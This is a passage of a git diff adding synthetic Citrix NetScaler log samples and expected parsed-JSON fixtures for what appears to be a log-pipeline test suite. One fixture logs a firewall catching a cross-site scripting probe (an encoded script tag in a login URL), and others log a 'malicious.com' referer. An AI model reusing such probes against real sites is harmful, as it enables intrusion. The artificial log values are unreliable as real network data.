192.168.1.53:22 - Destination 1.128.0.0:443 - SSLRelayAddress 10.0.0.53:443 - customername BetaInc - username:domainname someusername:example.domain.com - startTime "2023-04-01T09:00:00Z" - endTime "2023-04-01T09:45:00Z" - Duration 00:01:04 - Total_bytes_send 500000 - Total_bytes_recv 250000 - Total_compressedbytes_send 350000 - Total_compressedbytes_recv 175000 - Compression_ratio_send 50.00% - Compression_ratio_recv 70.00% - connectionId 1a2b3c +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN TCPCONNSTAT 4471 0 : User AliceCooper - Client_ip 192.168.1.54 - Nat_ip 10.0.0.54 - Vserver 1.128.0.0:20443 - Source 192.168.1.55:443 - Destination 1.128.0.0:22 - Start_time "2023-04-01T10:00:00Z" - End_time "2023-04-01T11:00:00Z" - Duration 00:02:04 - Total_bytes_send 800000 - Total_bytes_recv 400000 - Total_compressedbytes_send 560000 - Total_compressedbytes_recv 280000 - Compression_ratio_send 70.00% - Compression_ratio_recv 70.00% - Access Full - Group(s) "Developers,QA" +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN TCPCONN_TIMEDOUT 4471 0 : User CharlieBrown - Client_ip 192.168.1.56 - Nat_ip 10.0.0.56 - Vserver 1.128.0.0:10443 - Last_contact "2023-04-01T13:00:00Z" - Group(s) "Sales,Marketing" +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN UDPFLOWSTAT 4471 0 : User DianaPrince - Client_ip 192.168.1.57 - Nat_ip 10.0.0.57 - Vserver 1.128.0.0:443 - Source 192.168.1.58:3389 - Destination 1.128.0.0:22 - Start_time "2023-04-01T14:00:00Z" - End_time "2023-04-01T15:00:00Z" - Duration 00:03:04 - Total_bytes_send 1200000 - Total_bytes_recv 600000 - Access RemoteDesktop - Group(s) "Management,Executives" +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN NONHTTP_RESOURCEACCESS_DENIED 4471 0 : - Denied_by_policy "SecurityPolicy" +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN HTTP_RESOURCEACCESS_DENIED 4471 0 : - Denied_by_policy "UnauthorizedAccessAttempt" +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN LICLMT_REACHED 4471 0 : Vserver 1.128.0.0:443 - License_limit 500 +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN CLISEC_CHECK 4471 0 : Alert: High - ClientIP 192.168.1.100 - Vserver 1.128.0.0:443 - Client_security_expression "geoLocationBlocked" - +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN CLISEC_EXP_EVAL 4471 0 : User ClarkKent :- Client IP 192.168.1.101 - Vserver 1.128.0.0:443 - ClientsecuritycheckPassed(200)ontheclientmachine +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN STA_VALIDATE_RESP 4471 0 : Xdatalen 1024 - Xdata PayloadWithSensitiveInformation +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_HANDSHAKE_FAILURE 4471 0 : Backend SPCBId 128 - ServerIP 1.128.0.0 - ServerPort 443 - ProtocolVersion TLS1.2 - CipherSuite "ECDHE-RSA-AES256-GCM-SHA384" - Session 0x12a7bf +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_HANDSHAKE_SUCCESS 4471 0 : Backend SPCBId 256 - ServerIP 1.128.0.0 - ServerPort 843 - ProtocolVersion TLS1.3 - CipherSuite "TLS_AES_128_GCM_SHA256" - Session 0x12a7c0 +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_CERT_EXPIRY_IMMINENT 4471 0 : Certificate Key Pair RSA2048 - Days To Expire 365 +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_HANDSHAKE_ISSUERNAME 4471 0 : SPCBId 512 - Issuer Name "CN=Example CA, O=Example Organization, C=US" +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_HANDSHAKE_SUBJECTNAME 4471 0 : SPCBId 1024 - Subject Name "CN=www.example.com, O=Example Company, C=US" +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_CRL_UPDATE_SUCCESS 4471 0 : crl_name ExampleCRL - server_ip 1.128.0.0 - server_port 389 - method LDAP - ldapscope SUB +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_CRL_UPDATE_FAILURE 4471 0 : crl_name AnotherCRL - server_ip 1.128.0.0 - server_port 636 - method LDAP - ldapscope BASE +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_OCSPURL_RESOLVE_SUCCESS 4471 0 : Domainname example.com Ipaddress 1.128.0.0 +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_OCSPURL_RESOLVE_FAILURE 4471 0 : Domainname example.net Ipaddress 1.128.0.0 +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SUBSCRIBER SESSION_EVENT 4471 0 : Session 12345 +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SUBSCRIBER SESSION_FAILURE 4471 0 : Failure Reason: CredentialsInvalid +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : AAA LOGIN_FAILED 4471 0 : User john.doe - Client_ip 192.168.1.104 - Failure_reason "Invalid password" - Browser Chrome +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : AAA EXTRACTED_GROUPS 4471 0 : Extracted_groups "Engineering,Staff" +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_XMLPAYLOAD_CONTENT_TYPE_MISMATCH 4471 0 : XML Mismatched content-type in HTTP header detected = "text/plain". +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_DENYURL 4471 0 : Disallow Deny URL for rule pattern = "http://example.com/badpath". +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_CONTENT_TYPE 4471 0 : Unknown content-type header value = "application/unknown". +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_REFERER_HEADER 4471 0 : parsing referer header 'http://malicious.com' failed +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_BUFFEROVERFLOW_URL 4471 0 : URL length(2150) is greater than maximum allowed(2048). +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_BUFFEROVERFLOW_COOKIE 4471 0 : Cookie header length(1025) is greater than maximum allowed(1000). +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_BUFFEROVERFLOW_HDR 4471 0 : Header(Referer) length(550) is greater than maximum allowed(512). +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_BUFFEROVERFLOW_QUERY 4471 0 : Query string length(1150) is greater than maximum allowed(1024). +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_BUFFEROVERFLOW_TOTAL_HDR 4471 0 : Total HTTP header length(4600) is greater than maximum allowed(4096). +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_BIND_TO_PROFILE 4471 0 : Profile: UserAccount +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_BIND_XML_TO_PROFILE 4471 0 : Profile: AdminSettings +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_ADD_FIELDTYPE 4471 0 : Field Type: String +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_ADD_PROFILE 4471 0 : Profile: SecurityConfig +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_RM_FIELDTYPE 4471 0 : Field Type: Integer +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_RM_PROFILE 4471 0 : Profile: NetworkPreferences +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_ADD_CFFIELD 4471 0 : Field Name: Username +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_RM_CFFIELD 4471 0 : Field Name: Password +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_MEMORY_ERR 4471 0 : Content length is too large(4294967296 Bytes). Memory Allocation failed. +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_SIGNATURE_ERR 4471 0 : Signature id 429 contains no fast match pattern +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_SESSIONLIMIT 4471 0 : Appfw maximum session Limit reached for PEID 42 +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_ADD_RFCPROFILE 4471 0 : APPFW RFC Profile: WebApplicationSecurity +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_RM_RFCPROFILE 4471 0 : APPFW RFC Profile: APIGatewaySecurity +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_NEW_SIGNATURE_ADDED 4471 0 : New signature available: RuleID = 101 +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_DEPLOY_RELAXATION_DP 4471 0 : Learned rule will be auto-deployed after 15mins. ViolType: XSS. Profile: UserProfiles +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : RDP RDP_EVENT 4471 0 : User Name: JohnDoe +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : RDP RDP_CONNECTION_EVENT 4471 0 : User Name: JaneSmith +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ICA SESSION_SETUP 4471 0 : session_guid ABC123 - device_serial_number 1001 - client_cookie: xyz123 - flags 12345 - session_setup_time 2023-04-05T12:34:56Z - client_ip 1.128.0.0 - client_type 2 - client_launcher 1 - client_version 1.0.0 - client_hostname client1 - domain_name example.com - server_name ServerA - connection_priority 5 - access_type 1 - status 1 - username user1 +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ICA CHANNEL_UPDATE 4471 0 : session_guid DEF456 - device_serial_number 1002 - client_cookie abc456 - flags 67890 - channel_update_begin 2023-04-05T12:35:00Z - channel_update_end 2023-04-05T12:35:59Z - channel_id_1 1 - channel_id_1_val 10 - channel_id_2 2 - channel_id_2_val 20 - channel_id_3 3 - channel_id_3_val 30 - channel_id_4 4 - channel_id_4_val 40 - channel_id_5 5 - channel_id_5_val 50 +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ICA SESSION_UPDATE 4471 0 : session_guid GHI789 - device_serial_number 1003 - client_cookie ghi789 - flags 13579 - nsica_session_status 2 - nsica_session_client_ip 1.128.0.0 - nsica_session_client_port 12345 - nsica_session_server_ip 1.128.0.0 - nsica_session_server_port 54321 - nsica_session_reconnect_count 3 - nsica_session_acr_count 1 - connection_priority 8 - timestamp 2022-09-27T18:00:00.000 - +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ICA L7_LATENCY_UPDATE 4471 0 : session_guid JKL012 - device_serial_number 1004 - client_cookie jkl012 - flags 24680 - nsica_status 3 - L7LatencyThresholdFactor 2 - L7LatencyWaittime 100 - L7LatencyNotifyInterval 30 - L7LatencyMaxNotifyCount 5 - L7ThresholdBreachAvgClientsideLatency 120 - L7ThresholdBreachMaxClientsideLatency 150 - L7ThresholdBreachAvgServersideLatency 80 - L7ThresholdBreachMaxServersideLatency 100 - MinL7Latency 60 - +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ICA SESSION_TERMINATE 4471 0 : session_guid MNO345 - device_serial_number 1005 - client_cookie mno345 - flags 54321 - session_end_time 2023-04-05T12:37:00Z +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ICA NETWORK_UPDATE 4471 0 : session_guid PQR678 - device_serial_number 1006 - client_cookie pqr678 - flags 98765 - ica_rtt 120 - clientside_rxbytes 1500 - clientside_txbytes 2000 - clientside_packet_retransmits 5 - serverside_packet_retransmits 3 - clientside_rtt 130 - serverside_rtt 140 - clientside_jitter 2 - serverside_jitter 3 +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ICA APPLICATION_LAUNCH 4471 0 : session_guid STU901 - device_serial_number 1007 - client_cookie stu901 - flags 112233 - startup_duration 45 - launch_mechanism 1 - app_launch_time 2023-04-05T12:38:00Z - app_process_id 9876 - app_name ExampleApp - module_path C:/Program Files/ExampleApp +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ICA APPLICATION_TERMINATE 4471 0 : session_guid VWX234 - device_serial_number 1008 - client_cookie vwx234 - flags 445566 - app_termination_type 0 - app_process_id 9877 - app_termination_time 2023-04-05T12:39:00Z +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : AAATM LOGIN 4471 0 : User Alice - Client_ip 1.128.0.0 - Nat_ip 1.128.0.0 - Vserver 1.128.0.0:443 - Browser_type "Firefox" - Group(s) "Admin,IT" +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : AAATM LOGOUT 4471 0 : User Bob - Client_ip 1.128.0.0 - Nat_ip 10.0.0.2 - Vserver 10.0.0.2:10443 - Start_time "2023-04-04T08:30:00Z" - End_time "2023-04-04T09:30:00Z" - Duration 00:00:04 - Http_resources_accessed 20 - Total_TCP_connections 50 - Total_policies_allowed 45 - Total_policies_denied 5 - Total_bytes_send 3 - Total_bytes_recv 50 - Total_compressedbytes_send 1 - Total_compressedbytes_recv 500 - Compression_ratio_send 50.00% - Compression_ratio_recv 35.00% - LogoutMethod "UserInitiated" - Group(s) "HR,Finance" +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : AAATM HTTP_RESOURCEACCESS_DENIED 4471 0 : - Denied_by_policy "AccessRestriction" +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : CVPN CVPN_INPUT_URL 4471 0 : HTML_URL https://example.com/page +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : CVPN CVPN_REWRITTEN_URL 4471 0 : REWRITTEN_URL https://example.com/proxy?url=page +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : CVPN CVPN_MATCHED_URL 4471 0 : MATCHED_URL https://example.com/assets/image.jpg +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TRANSFORM ACTION_MISMATCH 4471 0 : Client 1.128.0.0 - Profile ThreatPrevention - Action Alert - Value High +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TRANSFORM PCRE_ERROR 4471 0 : Client 1.128.0.0 - Profile ContentFilter - Action Validate - PCRE error code 5 +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TRANSFORM REQ_WRITE_ERROR 4471 0 : Client 1.128.0.0 - Profile Gateway - Failed to write Location request header +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : BOT BOT_SIG_AUTO_UPDATE 4471 0 : Bot New Signature Available. Newly added Rules: 5 DeletedRules: 2 +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : PITBOSS PITBOSS 4471 0 : Adding pitboss watch on (1024) +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : PITBOSS PITBOSS 4471 0 : Deleting watch on (2048) +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : PITBOSS PB_SYSTEM_RESTART 4471 0 : proc (4096) (DatabaseService) has had its maximum number of restarts (3), rebooting the system +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : PITBOSS PB_PROCESS_RESTART 4471 0 : Restarting process old pid (8192) action (respawn) +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_HANDSHAKE_SUCCESS 37819 0 : SPCBId 3376175 - ClientIP 1.128.0.1 - ClientPort 2357 - VserverServiceIP 1.128.0.2 - VserverServicePort 443 - ClientVersion TLSv1.3 - CipherSuite "TLS1.3-AES256-GCM-SHA384" - Session New - HandshakeTime 55 ms +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_HANDSHAKE_SUCCESS 37819 0 : Backend SPCBId 3376176 - ServerIP 10.10.41.205 - ServerPort 8443 - ProtocolVersion TLSv1.2 - CipherSuite "TLS1.2-ECDHE-RSA-AES256-GCM-SHA384" - Session New - SERVER_AUTHENTICATED -SerialNumber "12CF1F64F01429F7" - SignatureAlgorithm "sha256WithRSAEncryption" - ValidFrom "Apr 20 07:46:28 2023 GMT" - ValidTo "May 1 20:22:03 2024 GMT" - HandshakeTime 8 ms +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : default SSLLOG SSL_HANDSHAKE_ISSUERNAME 39207 0 : SPCBId 3376283 - IssuerName " C=US,ST=Arizona,L=Scottsdale,O=GoDaddy.com, Inc.,OU=http://crts.godaddy.com/repository/,CN=Go Daddy Secure Certificate Authority - G2" +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : default SSLLOG SSL_HANDSHAKE_FAILURE 31626 0 : SPCBId 2558141 - ClientIP 1.128.0.0 - ClientPort 54686 - VserverServiceIP 1.128.0.1 - VserverServicePort 443 - ClientVersion TLSv1.0 - CipherSuite "NA"Session New - Reason "Wrong protocol version in the message" +Jun 22 19:14:37 81.2.69.144 06/22/2015:19:14:37 GMT ns 0-PPE-1 : SSLVPN HTTPREQUEST 4471 0 : Context someusername@1.128.0.0 - SessionId: 12690921 - example.domain.com User someusername : Group(s) N/A : Vserver 1.128.0.1:443 - 2022/06/14:16:07:48 : SSO is ON : GET /Citrix/Redacted/URL/Path - - +Jun 22 19:14:37 81.2.69.144 06/22/2015:19:14:37 GMT ns 0-PPE-1 : SSLVPN HTTPREQUEST 4471 0 : Context another.email@company.com@1.128.0.0- SessionId: 104248- some-domain.company.com User some.email@company.com : Group(s) N/A : Vserver 1.128.0.1:443 - 07/07/2022:11:22:00 GMT POST /Some/Url/Concealed - - +Jun 22 19:14:37 81.2.69.144 06/22/2015:19:14:37 GMT ns 0-PPE-1 : SSLVPN ICAEND_CONNSTAT 4471 0 : Source 1.128.0.0:54547 - Destination 1.128.0.1:444 - SSLRelayAddress 1.128.0.2:2598 - customername - username:domainname someusername:example.domain.com - startTime "2022/06/14:16:17:51" - endTime "2022/06/14:16:18:18" - Duration 00:00:27 - Total_bytes_send 193250 - Total_bytes_recv 36983 - Total_compressedbytes_send 0 - Total_compressedbytes_recv 0 - Compression_ratio_send 0.00% - Compression_ratio_recv 0.00% - connectionId 2812c48 - Total_bytes_wire_send 8028915850309104489 - Total_bytes_wire_recv 8320800952261094732 +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : UI CMD_EXECUTED 4471 0 : User jane.doe - ADM_User john - Remote_ip 192.168.1.105 - Command "scp file.txt" - Status "Success" +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_REST_VALIDATION 4471 0 : Rest Validation relaxation rule: Allow hit at url: https://service.example.org/query?id=1234 +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_REST_VALIDATION 4471 0 : gRPC Validation relaxation rule: Allow hit at url: https://service.example.org/query?id=1234 diff --git a/packages/citrix_adc/data_stream/log/_dev/test/pipeline/test-citrix-waf-native.log-expected.json b/packages/citrix_adc/data_stream/log/_dev/test/pipeline/test-citrix-waf-native.log-expected.json new file mode 100644 index 00000000000..00fcf0a468e --- /dev/null +++ b/packages/citrix_adc/data_stream/log/_dev/test/pipeline/test-citrix-waf-native.log-expected.json @@ -0,0 +1,8517 @@ +{ + "expected": [ + { + "@timestamp": "2015-06-22T19:14:37.000Z", + "citrix": { + "cef_format": false, + "default_class": true, + "detail": "06/22/2015:19:14:37 GMT ns 0-PPE-1 : default APPFW APPFW_cross-site scripting 60 0 : 175.16.199.1 616-PPE1 y/3upt2K8ySWWId3Kavbxyni7Rw0000 pr_ffc http://aaron.stratum8.net/FFC/login.php?login_name=abc&passwd=12345&drinking_pref=on&text_area=%3Cscript%3E%0D%0A&loginButton=ClickToLogin&as_sfid=AAAAAAWEXcNQLlSokNmqaYF6dvfqlChNzSMsdyO9JXOJomm2vBwAMOqZIChv21EcgBc3rexIUcfm0vckKlsgoOeC_BArx1Ic4NLxxkWMtrJe4H7SOfkiv9NL7AG4juPIanTvVo%3D&as_fid=feeec8758b41740eedeeb6b35b85dfd3d5def30c Cross-site script check failed for field text_area=\"Bad tag: script\" ", + "device_event_class_id": "APPFW", + "extended": { + "message": "175.16.199.1 616-PPE1 y/3upt2K8ySWWId3Kavbxyni7Rw0000 pr_ffc http://aaron.stratum8.net/FFC/login.php?login_name=abc&passwd=12345&drinking_pref=on&text_area=%3Cscript%3E%0D%0A&loginButton=ClickToLogin&as_sfid=AAAAAAWEXcNQLlSokNmqaYF6dvfqlChNzSMsdyO9JXOJomm2vBwAMOqZIChv21EcgBc3rexIUcfm0vckKlsgoOeC_BArx1Ic4NLxxkWMtrJe4H7SOfkiv9NL7AG4juPIanTvVo%3D&as_fid=feeec8758b41740eedeeb6b35b85dfd3d5def30c Cross-site script check failed for field text_area=\"Bad tag: script\" " + }, + "facility": "local0", + "host": "ns", + "name": "APPFW_cross-site scripting", + "priority": "info" + }, + "citrix_adc": { + "log": { + "message": "175.16.199.1 616-PPE1 y/3upt2K8ySWWId3Kavbxyni7Rw0000 pr_ffc http://aaron.stratum8.net/FFC/login.php?login_name=abc&passwd=12345&drinking_pref=on&text_area=%3Cscript%3E%0D%0A&loginButton=ClickToLogin&as_sfid=AAAAAAWEXcNQLlSokNmqaYF6dvfqlChNzSMsdyO9JXOJomm2vBwAMOqZIChv21EcgBc3rexIUcfm0vckKlsgoOeC_BArx1Ic4NLxxkWMtrJe4H7SOfkiv9NL7AG4juPIanTvVo%3D&as_fid=feeec8758b41740eedeeb6b35b85dfd3d5def30c Cross-site script check failed for field text_area=\"Bad tag: script\" " + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "60", + "original": "Jun 22 19:14:37 81.2.69.144 06/22/2015:19:14:37 GMT ns 0-PPE-1 : default APPFW APPFW_cross-site scripting 60 0 : 175.16.199.1 616-PPE1 y/3upt2K8ySWWId3Kavbxyni7Rw0000 pr_ffc http://aaron.stratum8.net/FFC/login.php?login_name=abc&passwd=12345&drinking_pref=on&text_area=%3Cscript%3E%0D%0A&loginButton=ClickToLogin&as_sfid=AAAAAAWEXcNQLlSokNmqaYF6dvfqlChNzSMsdyO9JXOJomm2vBwAMOqZIChv21EcgBc3rexIUcfm0vckKlsgoOeC_BArx1Ic4NLxxkWMtrJe4H7SOfkiv9NL7AG4juPIanTvVo%3D&as_fid=feeec8758b41740eedeeb6b35b85dfd3d5def30c Cross-site script check failed for field text_area=\"Bad tag: script\" ", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2017-12-04T17:21:00.000Z", + "citrix": { + "cef_format": false, + "detail": "12/04/2017:17:21:00 GMT citrix.netscaler.test 0-PPE-1 : SSLLOG SSL_HANDSHAKE_SUCCESS 5743593 0 : SPCBId 87630 - ClientIP 172.25.184.157 - ClientPort 19849 - VserverServiceIP 10.254.14.94 - VserverServicePort 443 - ClientVersion TLSv1.2 - CipherSuite \"RC4-MD5 TLSv1.2 Non-Export 128-bit\" - Session Reuse", + "device_event_class_id": "SSLLOG", + "extended": { + "message": "SPCBId 87630 - ClientIP 172.25.184.157 - ClientPort 19849 - VserverServiceIP 10.254.14.94 - VserverServicePort 443 - ClientVersion TLSv1.2 - CipherSuite \"RC4-MD5 TLSv1.2 Non-Export 128-bit\" - Session Reuse" + }, + "facility": "local0", + "host": "citrix.netscaler.test", + "name": "SSL_HANDSHAKE_SUCCESS", + "priority": "info" + }, + "citrix_adc": { + "log": { + "cipher_suite": "RC4-MD5 TLSv1.2 Non-Export 128-bit", + "client_ip": "172.25.184.157", + "client_port": 19849, + "client_version": "TLSv1.2", + "message": "SPCBId 87630 - ClientIP 172.25.184.157 - ClientPort 19849 - VserverServiceIP 10.254.14.94 - VserverServicePort 443 - ClientVersion TLSv1.2 - CipherSuite \"RC4-MD5 TLSv1.2 Non-Export 128-bit\" - Session Reuse", + "session": "Reuse", + "spcb_id": "87630", + "vserver": { + "ip": "10.254.14.94", + "port": 443 + } + } + }, + "client": { + "ip": "172.25.184.157", + "port": 19849 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "5743593", + "original": "Jun 22 19:14:37 81.2.69.144 12/04/2017:17:21:00 GMT citrix.netscaler.test 0-PPE-1 : SSLLOG SSL_HANDSHAKE_SUCCESS 5743593 0 : SPCBId 87630 - ClientIP 172.25.184.157 - ClientPort 19849 - VserverServiceIP 10.254.14.94 - VserverServicePort 443 - ClientVersion TLSv1.2 - CipherSuite \"RC4-MD5 TLSv1.2 Non-Export 128-bit\" - Session Reuse", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "10.254.14.94", + "172.25.184.157" + ] + }, + "server": { + "ip": "10.254.14.94", + "port": 443 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "tls": { + "cipher": "RC4-MD5 TLSv1.2 Non-Export 128-bit", + "version": "1.2", + "version_protocol": "TLS" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TCP CONN_DELINK 4471 0 : Source 192.168.10.10:52187 - Vserver 81.2.69.144:80 - NatIP 192.168.10.10:52187 - Destination 81.2.69.144:80 - Delink Time 10/06/2014:14:03:23 GMT - Total_bytes_send 1075 - Total_bytes_recv 352", + "device_event_class_id": "TCP", + "extended": { + "message": "Source 192.168.10.10:52187 - Vserver 81.2.69.144:80 - NatIP 192.168.10.10:52187 - Destination 81.2.69.144:80 - Delink Time 10/06/2014:14:03:23 GMT - Total_bytes_send 1075 - Total_bytes_recv 352" + }, + "facility": "local0", + "host": "ns1", + "name": "CONN_DELINK", + "priority": "info" + }, + "citrix_adc": { + "log": { + "delink_time": "2014-10-06T14:03:23.000Z", + "delink_timezone": "GMT", + "destination": { + "ip": "81.2.69.144", + "port": 80 + }, + "message": "Source 192.168.10.10:52187 - Vserver 81.2.69.144:80 - NatIP 192.168.10.10:52187 - Destination 81.2.69.144:80 - Delink Time 10/06/2014:14:03:23 GMT - Total_bytes_send 1075 - Total_bytes_recv 352", + "nat": { + "ip": "192.168.10.10", + "port": 52187 + }, + "source": { + "ip": "192.168.10.10", + "port": 52187 + }, + "total_bytes_received": 352, + 